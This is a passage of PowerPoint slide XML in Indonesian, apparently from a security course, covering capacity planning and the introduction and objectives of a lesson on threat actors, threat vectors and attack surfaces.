              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inisiatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inovasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pasar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengupayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beradaptasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik-teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2665963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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan Pelajaran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe-tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
